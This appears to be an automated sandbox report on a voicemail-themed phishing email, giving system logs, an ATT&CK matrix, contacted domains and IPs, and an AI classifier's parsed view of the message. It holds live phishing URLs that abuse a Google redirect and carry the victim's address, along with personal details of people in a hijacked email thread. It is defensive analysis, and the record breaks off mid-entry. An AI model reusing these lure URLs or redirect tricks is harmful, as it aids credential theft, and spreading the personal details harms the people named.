Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Modify Registry		LSASS Memory13
System Information Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		1
Process Injection		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection		1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://condominioanacarolina.com.br/favicon.ico0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
yzpwvvyfpujhuri8bzaim9cqk9lqh7xhihnydfguqpg7hopl7b5677zv1g3.aeeouirl.ru
104.21.25.176
truefalse
    		unknown
    ox0itqwgw8xcz6dl6uphi82rj1nkyu7hpvbuvd7nsbrtptg6jesm1kiu.aeeouirl.ru
    		172.67.134.110
    		truefalse
      		unknown
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		high
        google.com
        		142.250.186.110
        		truefalse
          		high
          CDG-efz.ms-acdc.office.com
          		52.98.227.178
          		truefalse
            		high
            ORY-efz.ms-acdc.office.com
            		52.98.159.194
            		truefalse
              		unknown
              l4t2chw8bqozm6lxxwcveyntznrcndgjvjlajqr2jr8aui2nnscya6iv.birsbunh.ru
              		188.114.96.3
              		truefalse
                		unknown
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		high
                  condominioanacarolina.com.br
                  		191.252.128.160
                  		truefalse
                    		unknown
                    mrwa.ungonditc.com
                    		188.114.97.3
                    		truefalse
                      		unknown
                      www.google.es
                      		142.250.185.195
                      		truefalse
                        		high
                        code.jquery.com
                        		151.101.130.137
                        		truefalse
                          		high
                          cdnjs.cloudflare.com
                          		104.17.24.14
                          		truefalse
                            		high
                            challenges.cloudflare.com
                            		104.18.95.41
                            		truefalse
                              		high
                              sni1gl.wpc.omegacdn.net
                              		152.199.21.175
                              		truefalse
                                		high
                                www.google.com
                                		142.250.186.164
                                		truefalse
                                  		high
                                  www.microsoft365.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    aadcdn.msftauth.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      outlook.live.com
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        assets.onestore.ms
                                        		unknown
                                        		unknownfalse
                                          		high
                                          ajax.aspnetcdn.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.microsoftonline.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              c.s-microsoft.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                identity.nel.measure.office.net
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.outlook.com
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    excel.office.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      login.microsoftonline.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                          		unknown
                                                          https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                            		unknown
                                                            http://condominioanacarolina.com.br/lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29tfalse
                                                              		unknown
                                                              http://condominioanacarolina.com.br/favicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                13.107.6.156
                                                                		unknownUnited States
                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                152.199.19.160
                                                                		unknownUnited States
                                                                		15133EDGECASTUSfalse
                                                                40.126.32.140
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                13.107.246.45
                                                                		s-part-0017.t-0009.t-msedge.netUnited States
                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                52.109.89.18
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                20.189.173.5
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                172.217.18.14
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                104.102.41.166
                                                                		unknownUnited States
                                                                		16625AKAMAI-ASUSfalse
                                                                104.18.94.41
                                                                		unknownUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                104.21.25.176
                                                                		yzpwvvyfpujhuri8bzaim9cqk9lqh7xhihnydfguqpg7hopl7b5677zv1g3.aeeouirl.ruUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                172.217.23.106
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                151.101.130.137
                                                                		code.jquery.comUnited States
                                                                		54113FASTLYUSfalse
                                                                2.19.126.202
                                                                		unknownEuropean Union
                                                                		16625AKAMAI-ASUSfalse
                                                                8.8.8.8
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                184.28.89.233
                                                                		unknownUnited States
                                                                		16625AKAMAI-ASUSfalse
                                                                191.252.128.160
                                                                		condominioanacarolina.com.brBrazil
                                                                		27715LocawebServicosdeInternetSABRfalse
                                                                40.126.32.74
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                88.221.110.176
                                                                		unknownEuropean Union
                                                                		20940AKAMAI-ASN1EUfalse
                                                                2.19.126.160
                                                                		unknownEuropean Union
                                                                		16625AKAMAI-ASUSfalse
                                                                52.109.89.19
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                35.190.80.1
                                                                		a.nel.cloudflare.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                52.113.194.132
                                                                		unknownUnited States
                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                104.17.24.14
                                                                		cdnjs.cloudflare.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                142.250.185.67
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                40.126.32.133
                                                                		unknownUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                1.1.1.1
                                                                		unknownAustralia
                                                                		13335CLOUDFLARENETUSfalse
                                                                108.177.15.84
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                52.98.227.178
                                                                		CDG-efz.ms-acdc.office.comUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                23.32.185.131
                                                                		unknownUnited States
                                                                		16625AKAMAI-ASUSfalse
                                                                104.18.95.41
                                                                		challenges.cloudflare.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                151.101.2.137
                                                                		unknownUnited States
                                                                		54113FASTLYUSfalse
                                                                88.221.110.163
                                                                		unknownEuropean Union
                                                                		20940AKAMAI-ASN1EUfalse
                                                                239.255.255.250
                                                                		unknownReserved
                                                                		unknownunknownfalse
                                                                188.114.97.3
                                                                		mrwa.ungonditc.comEuropean Union
                                                                		13335CLOUDFLARENETUSfalse
                                                                142.250.185.174
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                142.250.185.195
                                                                		www.google.esUnited States
                                                                		15169GOOGLEUSfalse
                                                                188.114.96.3
                                                                		l4t2chw8bqozm6lxxwcveyntznrcndgjvjlajqr2jr8aui2nnscya6iv.birsbunh.ruEuropean Union
                                                                		13335CLOUDFLARENETUSfalse
                                                                142.250.186.164
                                                                		www.google.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                152.199.21.175
                                                                		sni1gl.wpc.omegacdn.netUnited States
                                                                		15133EDGECASTUSfalse
                                                                52.98.159.194
                                                                		ORY-efz.ms-acdc.office.comUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                2.18.64.218
                                                                		unknownEuropean Union
                                                                		6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                172.217.16.195
                                                                		unknownUnited States
                                                                		15169GOOGLEUSfalse
                                                                104.17.25.14
                                                                		unknownUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                172.67.134.110
                                                                		ox0itqwgw8xcz6dl6uphi82rj1nkyu7hpvbuvd7nsbrtptg6jesm1kiu.aeeouirl.ruUnited States
                                                                		13335CLOUDFLARENETUSfalse

                                                                Private

                                                                IP
                                                                192.168.2.16

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1556705
                                                                Start date and time:2024-11-15 21:11:45 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:23
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                Analysis Mode:stream
                                                                Analysis stop reason:Timeout
                                                                Sample name:ee0b6b037b16b54632b6b37d1fb72727.eml
                                                                Detection:MAL
                                                                Classification:mal48.winEML@60/57@89/331
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .eml

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 52.109.89.19, 2.19.126.160, 2.19.126.136, 20.189.173.5, 172.217.16.195
                                                                • Excluded domains from analysis (whitelisted): omex.cdn.office.net, onedscolprdwus04.westus.cloudapp.azure.com, slscr.update.microsoft.com, weu-azsc-000.roaming.officeapps.live.com, clientservices.googleapis.com, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, a1864.dscd.akamai.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: ee0b6b037b16b54632b6b37d1fb72727.eml

                                                                LLM Input / Output

                                                                InputOutput
                                                                URL: email Model: Joe Sandbox AI
                                                                {
    "explanation": [
        "Suspicious sender domain 'generous-minds.com' doesn't match the claimed identity 'Audio.calls'",
        "Contains suspicious long encoded URL that attempts to mask its true destination",
        "Subject line about voicemail doesn't match the email thread content, indicating a spoofed conversation"
    ],
    "phishing": true,
    "confidence": 9
}
                                                                {
    "date": "Fri, 15 Nov 2024 17:21:09 -0800", 
    "subject": "[External] - MONTROSE-ENV: You have a Voice Mail  (if)", 
    "communications": [
        "You don't often get email from rbeuk@generous-minds.com. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification>\n\n<https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t>\n\n[cid:C91B23753AA0697700D1@WINCLJBGQJP]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n54054\n\n\n\n\n\n\nYes  Have not received estimate. Thanks Cyndi.\n\n\nThank you,\nJohn M Herrmann\nSERVICE MANAGER\nHill Idealease, LLC\n740-633-3011(Office)\n724-531-1195(Cell)\n740-633-2140(Fax)\n------------------\n\n\n\n", 
        "From: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com>\nSent: Wednesday, May 3, 2023 11:13 AM\nTo: John Herrmann <jherrmann@hillidealease.com>\nCc: Richard Reuille <rreuille@hillidealease.com>; Lisa Zwiesler <lzwiesler@hillidealease.com>\nSubject: RE: IDEALEASE 322913 / 321806\n\nUnit 321806 is in the shop.\n\nUnit #322913  Did you ever get a quote for this one, I seen it was started but looks like the parts were put on,  I will have them get this done ASAP.\n\n\nThank you ~ and make it a great day.\n\n\nCyndi Matvya\nService Administrator & Accounts Receivable\nShamrock Utility Trailers, Inc\n500 North Center Avenue, New Stanton, PA  15672<500%20North%20Center%20Avenue,%20New%20Stanton,%20PA%20%2015672>\n724-925-9200\n724-925-6999 FAX\n\n\n\n", 
        "From: John Herrmann <jherrmann@hillidealease.com<mailto:jherrmann@hillidealease.com>>\nSent: Wednesday, May 3, 2023 10:53 AM\nTo: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com<mailto:cmatvya@shamrockutilitytrailer.com>>\nCc: Richard Reuille <rreuille@hillidealease.com<mailto:rreuille@hillidealease.com>>; Lisa Zwiesler <lzwiesler@hillidealease.com<mailto:lzwiesler@hillidealease.com>>\nSubject: IDEALEASE 322913 / 321806\n\nGood morning Cyndi  I wanted to check and see the status of the units 322913 and 321806 we have there for box repairs.\n\n\nThank you,\nJohn M Herrmann\nSERVICE MANAGER\nHill Idealease, LLC\n<span\n________________________________\nCONFIDENTIALITY NOTICE: The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential, proprietary and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments and the reply from your system. If you are not the intended recipient, you are hereby notified that any disclosure, use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.\n"
    ], 
    "from": "\"Audio.calls\" <rbeuk@generous-minds.com>", 
    "to": "kelly.swanson@montrose-env.com", 
    "attachements": [
        "ilil.pdf"
    ]
}
                                                                URL: Email Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "To listen to your voicemail, please click the button below",
